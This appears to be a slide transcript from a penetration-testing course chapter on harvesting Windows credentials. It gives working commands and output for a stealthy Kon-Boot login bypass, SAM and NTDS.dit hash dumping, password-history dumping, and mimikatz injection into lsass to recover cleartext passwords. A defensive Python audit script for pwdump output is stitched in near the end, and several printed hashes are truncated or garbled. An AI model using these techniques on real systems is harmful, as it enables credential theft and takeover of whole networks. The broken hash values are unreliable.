WARNING! Sample chapter. Material in this sample chapter is selected from the advanced penetration course at https://training.zdresearch.com.

Presentation transcript:

WARNING! Sample chapter. Material in this sample chapter is selected from the advanced penetration course. We hope you enjoy it!

Obtaining Windows Passwords
Now that you know about pass-the-hash and how Windows hashing works, let's look at some attack scenarios. Let's assume that we are inside a network that uses a domain controller to manage resources and users.

Obtaining Windows Passwords
As a reminder, let's take a quick look again at how Active Directory works.

Obtaining Windows Passwords
OK, now let's go through the scenarios we can use to obtain NT and LM hashes for pass-the-hash attacks:
1- Physical attack and password bypass
2- Dumping NT and LM hashes using the SAM database
3- Dumping Windows passwords from the password history
4- Dumping passwords and hashes from logon sessions
5- Dumping hashed passwords from the Domain Controller

Physical attack and password bypass
In the first scenario we have physical access to the system, so how can we log in to a password-protected system? The answer is very easy: Windows offers no protection against physical-access attacks. You can use any live disk to modify the SAM database in /system32/config. You can boot from both USB and CD. But there is a problem with this method: the user will notice when you modify his or her password or add a totally new user. So what is the solution?

Physical attack and password bypass
Use Kon-Boot. You can buy it for $15. Kon-Boot applies a temporary patch to the kernel, so you can log in as any user without the password. Do your job and restart the system; the original password still works. So you have done a fully stealthy attack!

Dumping NT and LM hashes using SAM database
The second scenario uses the SAM database. You need a copy of the protected SAM file, which is not possible by default. Using HoboCopy or Fast RAW file copier makes it possible:
C:\hobo copy\x64>HoboCopy.exe c:\Windows\System32\config c:\config-bkp
44 files ( MB, 1 directories) copied, 0 files skipped

Dumping NT and LM hashes using SAM database
Now you can use creddump on your BT/Kali to extract the hashes. You can see the SYSTEM file here: this file is called the system hive (and also the syskey) and is used to provide a more secure password protection mechanism.
/root/SYSTEM /root/SAM
Administrator:500:1d9321d6da8213bdc fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::

Dumping Windows passwords from password history
In networks with more than 10 users you may be out of luck if you look at the SAM file. But depending on how the DC is configured, we may be able to use certain situations to attack the host machine. One of the main situations here is the password history feature.

Dumping Windows passwords from password history
This policy will not let a user use a password they already used within period X; for example, your next password after expiry can't be the same as the previous one. A very cool tool called QuarksPwDump can help you dump the hashes in this situation:
C:\>QuarksPwDump.exe -dhl -hist
Administrator:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA D4:::
Administrator_hist0:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA D4:::
Administrator_hist1:500:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F:::
Administrator_hist2:500:B757BF5C0D87772FAAD3B435B51404EE:7CE21F17C0AEE7FB9CEBA532D0546AD6:::

Dumping passwords and hashes from logon sessions
We are still not done! We have more very cool methods for obtaining Windows passwords. Windows keeps every single successful login in memory and calls this a logon session. The information in memory includes the username, workgroup and NT:LM hashed password. And this memory storage is not only about GUI logins; it can also happen from:
- RDP login
- Using the RunAs feature
- Using any API call that needs a login, like CreateProcessWithLogon
- Etc.

Dumping passwords and hashes from logon sessions
For extracting logon sessions, as you know, you need a privileged user. For this task we will use a French tool called mimikatz. This tool extracts passwords by injecting a DLL called sekurlsa.dll into the lsass.exe process. You can follow the method on the next slide to dump Windows passwords in clear text! Please note that the commands are what you type after the # sign.

Dumping passwords and hashes from logon sessions
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
…
mimikatz full
Authentification Id : 0; Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : Sensetive-man
msv1_0 :
* Utilisateur : Administrator
* Domaine : Sensetive-man
* Hash LM : 44efce164ab921caaad3b435b51404ee
* Hash NTLM : 32ed87bdb5fdc5e9cba d4
wdigest :
* Utilisateur : Administrator
* Domaine : Sensetive-man
* Mot de passe :
tspkg :
* Utilisateur : Administrator
* Domaine : Sensetive-man
* Mot de passe :
kerberos :
* Utilisateur : Administrator
* Domaine : Sensetive-man
* Mot de passe :
mimikatz #

Dumping passwords and hashes from logon sessions
OK, so we can get the clear-text password. Why? In Windows after Vista there is a new Security Support Provider (SSP) for RDP, called Tspkg for short. This feature adds single sign-on ("remember me!") to the protocol. And in almost all Windows versions we have another feature called WDigest, which is another SSP implementation for authentication; because of its logical flow, in order to respond to challenges it keeps a clear-text version of the password in memory.

Dumping passwords and hashes from logon sessions
Using the Kerberos protocol or msv1_0 authentication, which lsass uses for connecting to domains, will also force Windows to keep passwords in clear text. In the following figure you can see the SSP settings of a Windows 7 machine.

Dumping hashed password from Domain Controller
OK, we are at the last method in our Windows password dumping journey. By now you should easily understand that you can find your DC administrator's password in your host's memory. So you connect to your DC using RDP and look at the SAM file, and all you get is the DC machine's local users, not all the domain users. To get all users' passwords you should head to \windows\NTDS.

Dumping hashed password from Domain Controller
To accomplish this task we need two tools: one is called libesedb, and the other is the creddump we used before. So you have to compile libesedb and put the hash table you got from NTDS into the NTDS.export directory:
#cd libesedb
#chmod +x configure
#./configure && make
-- Now extract the hash table from ntds.dit and put it in the NTDS.export directory inside the same program directory:
#cd esedbtools
#./esedbdumphash ../../ntds.dit
Now you can use creddump to dump the passwords; remember you need the SYSTEM file:
python dsdump.py ../SYSTEM ../NTDS.export/datatable
Administrator:500:NO PASSWORD*********************:031F8E5A76932FC5CC ADAE4EC:::
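The creddump, QuarksPwDump and dsdump.py output shown in the SAM, password-history and NTDS slides all share the pwdump line format user:RID:LM:NT:::. As an added example that is not part of the course material, the Python below parses that format the way a defender reviewing such a dump would: it flags accounts that still store an LM hash (the empty-password LM value aad3b435b51404eeaad3b435b51404ee and dsdump's NO PASSWORD marker both mean LM hashing is off), flags empty NT hashes, and reports accounts whose current NT hash also appears in a _histN history entry. The sample dump is constructed; the hash values in it are not real.

```python
import re
# Well-known constants: LM hash of the empty password (stored when LM hashing is off) and NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

def parse_pwdump(text):
    """Parse pwdump-style lines (user:RID:LM:NT:::) into a dict keyed by account
    name; _histN lines (QuarksPwDump -hist) are folded into the base account."""
    accounts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError("malformed line: %r" % line)
        name, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        # Not 32 hex digits (e.g. dsdump's "NO PASSWORD***") or the empty-password value: no usable LM hash.
        lm = lm if HEX32.match(lm) and lm != EMPTY_LM else None
        nt = nt if HEX32.match(nt) else None
        hist = re.match(r"^(.+)_hist\d+$", name)
        base = hist.group(1) if hist else name
        acct = accounts.setdefault(base, {"rid": rid, "lm": None, "nt": None, "history": []})
        if hist:
            acct["history"].append(nt)
        else:
            acct["lm"], acct["nt"] = lm, nt
    return accounts

def audit(accounts):
    """Return (account, finding) pairs a reviewer of such a dump would act on."""
    findings = []
    for name, a in accounts.items():
        if a["lm"] is not None:
            findings.append((name, "LM hash stored: legacy LM hashing still enabled"))
        if a["nt"] == EMPTY_NT:
            findings.append((name, "empty password"))
        if a["nt"] is not None and a["nt"] in a["history"]:
            findings.append((name, "current password reused from password history"))
    return findings

# Constructed sample dump (not a real one) in the format shown on the slides above.
SAMPLE = """\
Administrator:500:1122334455667788aad3b435b51404ee:0a1b2c3d4e5f60718293a4b5c6d7e8f9:::
Administrator_hist0:500:1122334455667788aad3b435b51404ee:0a1b2c3d4e5f60718293a4b5c6d7e8f9:::
Administrator_hist1:500:8899aabbccddeeffaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:NO PASSWORD*********************:fedcba9876543210fedcba9876543210:::
"""
```

On the sample, `audit(parse_pwdump(SAMPLE))` reports the stored LM hash and the history reuse on Administrator and the empty password on Guest; svc_backup, whose LM field is dsdump's NO PASSWORD marker, produces no finding.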

End of sample
Using these simple tools and tricks you can successfully and completely compromise a lot of Windows networks during your penetration tests. I hope you enjoyed the sample, and see you in the full course!!!